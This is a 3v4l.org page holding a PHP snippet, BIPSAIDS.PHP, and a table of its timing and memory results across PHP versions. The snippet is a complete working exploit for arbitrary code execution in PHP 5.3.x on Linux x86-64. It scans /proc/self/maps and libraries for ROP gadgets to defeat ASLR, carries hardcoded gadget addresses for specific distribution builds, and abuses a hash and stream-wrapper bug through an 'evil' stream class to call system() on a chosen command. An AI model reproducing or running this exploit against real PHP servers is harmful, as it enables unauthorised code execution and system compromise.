3v4l.org

run code in 300+ PHP versions simultaneously
<?php /* * BIPSAIDS.PHP -- by blasty <blasty@fail0verflow.com> * * PHP 5.3.x Linux x86-64 arbitrary code execution * * based on : MOPS-2010-001 (yes, bugs from 2010 live in <s>2011</s> 2012) * * NOTES: * Most distro's ship with PIE compiled httpd's these days, and everyone * seems to favour php5 as module rather than using php-cgi. This puts us * in an annoying position for doing Return-oriented-whatever. * * So the bad news is this exploit only works without restrictions against * machines that use php5-cgi and where gadgets have already been identified. * * However, the good news is if PHP doesn't enforce open_basedir restrictions * there's still a fat chance this exploit will succeed by parsing /proc/self/maps * to circumvent ASLR and identify gadgets during runtime by scanning libraries. * */ error_reporting(E_ALL); $CMD = "php-4.3.0 --version"; function ustruct($fmt, $data) { $out = array(); $pos = 0; $upack = array('u16'=>'S','u32'=>'V','u64'=>'V2'); $sizes = array('u16'=> 2 ,'u32'=> 4 ,'u64'=> 8 ); foreach($fmt as $name => $type) { $v = unpack($upack[$type], substr($data, $pos, $sizes[$type])); if ($type == 'u64') $v = ($v[2] << 32) | $v[1]; else $v = $v[1]; $out[$name] = $v; $pos += $sizes[$type]; } return $out; } function get_sections($filename) { $elf64_header = array( 'e_ident0' => 'u64', 'e_ident1' => 'u64', 'type' => 'u16', 'machine' => 'u16', 'version' => 'u32', 'entry' => 'u64', 'phoff' => 'u64', 'shoff' => 'u64', 'flags' => 'u32', 'ehsize' => 'u16', 'phentsize' => 'u16', 'phnum' => 'u16', 'shentsize' => 'u16', 'shnum' => 'u16', 'shstrndx' => 'u16' ); $elf64_sh = array( 'name' => 'u32', 'type' => 'u32', 'flags' => 'u64', 'addr' => 'u64', 'offset' => 'u64', 'size' => 'u64', 'link' => 'u32', 'info' => 'u32', 'align' => 'u64', 'entsize'=> 'u64' ); $buf = file_get_contents($filename); $hdr = ustruct($elf64_header, substr($buf, 0, 0x40)); echo "[>>] $filename\n"; $sections = array(); for($i = 0; $i < $hdr['shnum']; $i++) { $data = substr($buf, $hdr['shoff'] + ($i * $hdr['shentsize']), $hdr['shentsize']); $sections[] = ustruct($elf64_sh, $data); } $str_section = $sections[ $hdr['shstrndx'] ]; $ret_sections = array(); for($i = 0; $i < count($sections); $i++) { if (!($sections[$i]['flags']&4)) continue; $v = explode("\x00", substr($buf, $str_section['offset'] + $sections[$i]['name']) ); $sections[$i]['str'] = $v[0]; $sections[$i]['data'] = substr($buf, $sections[$i]['offset'], $sections[$i]['size']); $ret_sections[] = $sections[$i]; } return $ret_sections; } function find_gadgets($gg, $data, $base=0) { $ret = array(); foreach($gg as $name => $patterns) { if (!is_array($patterns)) $patterns = array($patterns); foreach($patterns as $pattern) { if (($pos = strpos($data, $pattern)) !== false) { $ret[$name] = $base+$pos; } } } return $ret; } function w64($v) { return pack("V", $v & 0xffffffff) . pack("V", $v >> 32); } $resolve = true; if ( ((isset($_SERVER['ORIG_SCRIPT_NAME']) && strstr($_SERVER['ORIG_SCRIPT_NAME'], "cgi") !== false) || (isset($_SERVER['ORIG_SCRIPT_FILENAME']) && strstr($_SERVER['ORIG_SCRIPT_FILENAME'], "cgi") !== false)) ) { $resolve = false; $cgirop = array( "5.3.2-1ubuntu4.10" => array(0x42c1b8, 0x42fd31, 0x42c59d, 0x65ca2b, 0x5f0758, 0x53c720, 0xd6a830, 0x096a20), "5.3.5-1ubuntu7.3" => array(0x429d4f, 0x42f3e1, 0x428c26, 0x50b22d, 0x5f0758, 0x6b1730, 0xdae7d0, 0x095260), "5.3.3-7+squeeze3" => array(0x42d478, 0x4310c1, 0x42d85d, 0x648bdb, 0x5dc538, 0x527600, 0xd5b810, 0x084970), //"5.3.8" /* ARCH */ => array(0x42544c, 0x4294ba, 0x42460b, 0x428f57, 0x427859, 0x423476, ); $v = phpversion(); if (!isset($cgirop[$v])) { echo "plz2portgadgets: ".$v."\nattempting fallback!\n"; $resolve = true; } else $addy = $cgirop[$v]; } if (!isset($addy)) { $patterns = array( 'ADDRSP' => "\x48\x83\xc4\x28\xc3", 'POPRAX' => "\x58\xc3", 'LEACALL' => array( "\x48\x8d\x7c\x24\x10\xff\xd0", "\x48\x8d\x7c\x24\x18\xff\xe0" ), 'SYSTEM' => "\x53\x48\x83\xec\x10\x48\x85\xff\x74\x16" ); $maps = explode("\n", file_get_contents("/proc/self/maps") ); $gadgets = array(); foreach($maps as $map) { $map = explode(" ", preg_replace('!\s+!', ' ', $map)); if (count($map)<2 || !strstr($map[1], "x") || $map[5][0] == '[') continue; if (count($patterns) == 1 && !strstr($map[5], "libc")) continue; $exec_sections = get_sections($map[5]); $tmp = explode("-", $map[0]); $page_offs = hexdec($tmp[0]); foreach($exec_sections as $section) { $new_gadgets = find_gadgets( $patterns, $section['data'], $section['offset'] ); foreach($new_gadgets as $name => $offs) { if (isset($patterns[$name])) { printf(" `- found gadget '%s' in [%s -> %s] @ 0x%x\n", $name, $map[5], $section['str'], $page_offs+$offs); unset($patterns[$name]); $new_gadgets[$name] += $page_offs; } } if (count($new_gadgets) > 0) $gadgets = array_merge($gadgets, $new_gadgets); if (count($patterns) == 0) { echo "!!! ALL GADGETS FOUND, LETS-A-GO !!!\n"; break 2; } } } $addy = $gadgets; } if (isset($gadgets)) { $ropvar = array('ADDRSP','POPRAX','LEACALL','SYSTEM'); for($i = 0; $i < count($ropvar); $i++) { printf("setting %s to 0x%x\n", $ropvar[$i], $addy[ $ropvar[$i] ]); $$ropvar[$i] = w64($addy[ $ropvar[$i] ]); } } else { $ropvar = array('ADDRSP','POPRAX','POPRDI','DEREFRAX','SUBRDIRAX','LEACALL','GOTENTRY','LIBCDELTA'); for($i = 0; $i < count($ropvar); $i++) { printf("setting %s to 0x%x\n", $ropvar[$i], $addy[ $i ]); $$ropvar[$i] = w64($addy[ $i ]); } } if (!isset($addy) || count($addy) != count($ropvar)) die("looks like this tech isn't compatible with your box.\n"); class evil_stream { function stream_open($a, $b, $c, &$e) { return 1; } function stream_eof() { return 0; } function stream_seek($offset, $whence) { return 0; } function stream_read($count) { global $ADDRSP, $POPRAX, $GOTENTRY, $DEREFRAX, $POPRDI, $LIBCDELTA, $SUBRDIRAX, $LEACALL, $CMD, $SYSTEM; hash_final($GLOBALS['hid'], false); $GLOBALS['a'] = str_repeat($ADDRSP, 3); // add 40, rsp if (isset($SYSTEM) && !empty($SYSTEM)) return $POPRAX . $SYSTEM . $LEACALL . str_repeat("Z", 0x58) . "WOOP ; " . $CMD . "\x00"; else return $POPRAX . $GOTENTRY . $DEREFRAX . $POPRDI . $LIBCDELTA . $SUBRDIRAX . $LEACALL . str_repeat("Z", 0x58) . "WOOP ; " . $CMD . " ; echo lol\x00"; } } stream_wrapper_register("evil", "evil_stream") || die("oh snap :(\n"); $hid = hash_init('md5'); hash_update_file($hid, "evil://code"); echo "you goofed up\n"; ?>

Here you find the average performance (time & memory) of each version. A grayed out version indicates it didn't complete successfully (based on exit-code).

VersionSystem time (s)User time (s)Memory (MiB)
7.2.100.1160.00715.29
7.2.90.0780.00315.28
7.2.80.1110.01015.21
7.2.70.0860.00315.49
7.2.60.0940.00715.38
7.2.50.1020.01315.38
7.2.40.0940.00315.48
7.2.30.0840.00715.38
7.2.20.0580.00915.51
7.2.10.0840.00715.58
7.2.00.0610.00915.32
7.1.220.0580.00613.95
7.1.210.0660.00314.25
7.1.200.0690.00414.21
7.1.190.0820.01014.21
7.1.180.1190.00314.39
7.1.170.0670.00614.27
7.1.160.0880.00614.39
7.1.150.0080.01614.30
7.1.140.0680.01214.21
7.1.130.0890.00914.30
7.1.120.0720.01014.39
7.1.110.0820.00714.23
7.1.100.0890.01014.37
7.1.90.0640.00614.23
7.1.80.1050.00314.29
7.1.70.0880.00314.39
7.1.60.1320.00932.36
7.1.50.0310.01332.28
7.1.40.0460.00631.93
7.1.30.1230.00032.12
7.1.20.0350.00632.14
7.1.10.0870.01514.38
7.1.00.0740.00014.40
7.0.310.0680.01013.90
7.0.300.0950.01013.83
7.0.290.0130.00913.55
7.0.280.1030.00713.80
7.0.270.0820.00713.99
7.0.260.0870.00013.99
7.0.250.0800.00013.81
7.0.240.0880.00413.75
7.0.230.0590.00614.03
7.0.220.1210.01013.97
7.0.210.0080.01513.54
7.0.200.0110.00713.93
7.0.190.0570.00413.57
7.0.180.0080.00514.09
7.0.170.0080.00813.72
7.0.160.0150.00913.93
7.0.150.0090.00613.70
7.0.140.0420.00313.95
7.0.130.1440.00613.91
7.0.120.1240.00713.85
7.0.110.0180.00013.76
7.0.100.0040.01313.62
7.0.90.1240.00713.89
7.0.80.1260.01013.88
7.0.70.0880.00613.96
7.0.60.0590.01113.61
7.0.50.2070.00913.91
7.0.40.0590.00913.77
7.0.30.1510.00613.97
7.0.20.1500.00613.87
7.0.10.1590.00314.00
7.0.00.0870.00313.74
5.6.380.0030.01014.41
5.6.370.0100.00714.74
5.6.360.0190.00414.66
5.6.350.0180.00614.75
5.6.340.0090.01414.39
5.6.330.0190.00414.69
5.6.320.0110.00814.69
5.6.310.0120.00614.48
5.6.300.0090.00614.67
5.6.290.0100.00314.42
5.6.280.0090.00614.30
5.6.270.0150.00414.53
5.6.260.0110.00614.29
5.6.250.0120.00414.41
5.6.240.0110.00414.44
5.6.230.0030.01214.18
5.6.220.0110.00314.50
5.6.210.0090.00614.39
5.6.200.0140.00014.40
5.6.190.0030.01514.56
5.6.180.0060.00614.40
5.6.170.0100.00614.70
5.6.160.0040.01314.59
5.6.150.0050.01014.63
5.6.140.0040.00914.55
5.6.130.0150.00414.62
5.6.120.0150.00414.28
5.6.110.0060.00614.23
5.6.100.0000.01414.41
5.6.90.0090.00314.50
5.6.80.0080.00814.48
5.6.70.0000.01214.45
5.6.60.0000.01314.38
5.6.50.0000.01414.57
5.6.40.0090.00714.46
5.6.30.0090.00414.49
5.6.20.0030.01514.32
5.6.10.0120.00314.46
5.6.00.0120.01014.42
5.5.380.0340.06433.55
5.5.370.0300.05733.03
5.5.360.0300.06733.02
5.5.350.0300.05828.23
5.5.340.0610.03428.39
5.5.330.0400.07033.14
5.5.320.0430.04333.30
5.5.310.0420.04433.49
5.5.300.0380.05232.90
5.5.290.0400.05633.36
5.5.280.0580.03633.29
5.5.270.0220.05933.19
5.5.260.0290.05633.69
5.5.250.0320.05233.11
5.5.240.0430.04332.69
5.5.230.0310.05132.76
5.5.220.0360.04832.61
5.5.210.0380.04532.82
5.5.200.0450.04632.66
5.5.190.0320.05732.75
5.5.180.0430.05332.54
5.5.170.0060.00914.21
5.5.160.0450.04732.48
5.5.150.0450.04532.37
5.5.140.0480.04232.86
5.5.130.0310.06232.34
5.5.120.0290.05532.75
5.5.110.0370.05532.55
5.5.100.0490.07332.55
5.5.90.0580.05832.18
5.5.80.0350.05632.45
5.5.70.0360.06832.54
5.5.60.0430.06032.16
5.5.50.0270.06032.28
5.5.40.0260.05932.54
5.5.30.0360.05832.42
5.5.20.0420.05432.77
5.5.10.0430.04332.55
5.5.00.0360.06632.34
5.4.450.0390.04632.70
5.4.440.0440.04432.58
5.4.430.0320.06032.93
5.4.420.0380.04732.86
5.4.410.0290.06132.79
5.4.400.0330.05332.43
5.4.390.0320.05232.34
5.4.380.0430.04032.44
5.4.370.0390.05932.57
5.4.360.0400.07332.55
5.4.350.0350.05632.46
5.4.340.0210.06432.33
5.4.330.0290.06132.16
5.4.320.0220.06432.40
5.4.310.0540.04132.54
5.4.300.0360.07032.26
5.4.290.0380.05932.61
5.4.280.0420.04232.55
5.4.270.0350.05532.41
5.4.260.0510.06132.44
5.4.250.0430.06332.41
5.4.240.0480.04832.26
5.4.230.0330.06232.23
5.4.220.0470.05032.60
5.4.210.0400.06232.52
5.4.200.0330.05632.40
5.4.190.0280.06532.42
5.4.180.0320.06132.41
5.4.170.0480.05132.07
5.4.160.0300.06432.42
5.4.150.0350.05532.38
5.4.140.0520.03731.59
5.4.130.0390.05431.77
5.4.120.0330.05831.93
5.4.110.0430.06132.03
5.4.100.0410.05132.05
5.4.90.0460.05232.16
5.4.80.0340.06232.11
5.4.70.0330.05431.92
5.4.60.0300.05232.09
5.4.50.0290.05532.14
5.4.40.0500.05732.40
5.4.30.0310.05631.95
5.4.20.0400.06132.29
5.4.10.0270.06031.82
5.4.00.0380.05731.45
5.3.290.0290.06224.33
5.3.280.0270.06023.90
5.3.270.0290.05224.32
5.3.260.0390.02824.40
5.3.250.0310.04124.31
5.3.240.0280.05024.23
5.3.230.0230.04724.13
5.3.220.0250.05723.93
5.3.210.0390.03524.16
5.3.200.0420.03924.28
5.3.190.0270.05024.34
5.3.180.0280.04624.31
5.3.170.0290.04024.11
5.3.160.0290.04024.26
5.3.150.0250.03924.38
5.3.140.0240.06824.38
5.3.130.0140.05824.24
5.3.120.0160.05923.99
5.3.110.0280.03724.19
5.3.100.0180.05223.74
5.3.90.0440.04923.75
5.3.80.0260.04123.37
5.3.70.0310.03823.59
5.3.60.0310.04123.67
5.3.50.0350.03523.54
5.3.40.0240.04623.59
5.3.30.0340.04023.31
5.3.20.0310.01423.04
5.3.10.0270.03022.97
5.3.00.0160.03322.81

preferences:
37.39 ms | 400 KiB | 5 Q